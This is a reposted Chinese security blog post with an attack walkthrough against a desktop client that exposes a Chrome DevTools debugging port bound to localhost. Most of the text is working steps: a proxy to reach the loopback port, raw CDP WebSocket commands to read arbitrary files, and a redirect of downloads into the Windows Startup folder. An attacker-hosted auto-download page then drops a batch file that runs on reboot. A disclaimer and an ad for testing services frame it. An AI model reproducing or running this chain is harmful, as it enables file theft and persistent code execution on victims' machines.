文章总结: 本文详细展示了通过代理绕过127监听CDP与Websocket协议未授权实现RCE的完整攻击链,包括端口监听、代理配置、获取会话、文件读取与写入启动目录实现持久化,操作步骤清晰,可复现性强,对客户端安全防护具有重要参考价值。
综合评分: 78
文章分类: 渗透测试,红队,内网渗透,漏洞分析
【客户端安全】代理绕过127监听CDP+Websocket协议未授权RCE漏洞
原创
挖个洞先
挖个洞先
挖个洞先
2026年9月24日 01:08
河北
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
“
你上天入地我笑得想抽儿,
你大发慈悲我冷得发抖,
眼看你衣冠楚楚忘了遮羞,
月黑风高可别回头,
可怜你 招摇过市却步履蹒跚,
你说我还嫩 麻烦照照镜子行么,
我洋洋洒洒等的不过一记耳光,
就害人害己害了寻常。——《心静自然凉》
”
01
—
广告
承接项目,Web,App/PC客户端,物联网设备,联系方式todo243298(不接攻防不接公安)。
02
—
操作步骤
1、18667端口监听::
Get-NetTCPConnection -State Listen | Where-Object {$_.OwningProcess -in (Get-Process xxx -ErrorAction SilentlyContinue).Id} | Select LocalAddress,LocalPort,OwningProcess | Format-Table
2、yakit配置全局代理为目标机器ip:port,通过B机器攻击A机器
3、获取ws会话
9222端口监听127,不能远程触发,通过代理端口绕过
GET /json/version HTTP/1.1Host: 127.0.0.1:9222
4、连接ws,查看版本测试
GET /devtools/browser/6f8b762b-b23e-458e-a7c5-eab788c69b7b HTTP/1.1Host: 127.0.0.1:9222Accept-Language: zh-CN,zh;q=0.9Sec-WebSocket-Key: zpRVZDnNfCd+sYVS/DnNug==Accept-Encoding: gzip, deflate, br, zstdConnection: UpgradeSec-WebSocket-Version: 13Upgrade: websocket
{"id":1,"method":"Browser.getVersion","params":{}}
5、获取”sessionId”: “EF1C7304D8865F996D25A75EB036E024”
{"id":1,"method":"Target.createTarget","params":{"url":"about:blank"}}
{"id":2,"method":"Target.attachToTarget","params":{"targetId":"D12F693F545E2AD693BECD227CC6E22A","flatten":true}}
6、file:// 读取任意文件
{"id":3,"method":"Page.navigate","params":{"url":"file:///C:/Windows/win.ini"},"sessionId":"EF1C7304D8865F996D25A75EB036E024"}
7、查看文件内容
{"id":4,"method":"Runtime.evaluate","params":{"expression":"document.body.innerText"},"sessionId":"EF1C7304D8865F996D25A75EB036E024"}
8、确认文件内容
9、任意文件写入
{"id":5,"method":"Browser.setDownloadBehavior","params":{"behavior":"allow","downloadPath":"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup","eventsEnabled":true}}
10、构建自动下载页面,导航页面
{"id":6,"method":"Page.navigate","params":{"url":"http://10.130.195.164:9999/drop.html"},"sessionId":"EF1C7304D8865F996D25A75EB036E024"}
11、文件内容
<!DOCTYPE html><html><body><a id="a" href="calc.bat" download>update</a><script>document.getElementById('a').click();</script></body></html>
@echo offstart calc
12、启动目录持久化 RCE
{"id":7,"method":"Page.navigate","params":{"url":"file:///C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/"},"sessionId":"EF1C7304D8865F996D25A75EB036E024"}
{"id":8,"method":"Runtime.evaluate","params":{"expression":"document.body.innerText"},"sessionId":"EF1C7304D8865F996D25A75EB036E024"}
13、重启电脑后触发RCE漏洞
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:挖个洞先 挖个洞先
挖个洞先《【客户端安全】代理绕过127监听CDP+Websocket协议未授权RCE漏洞》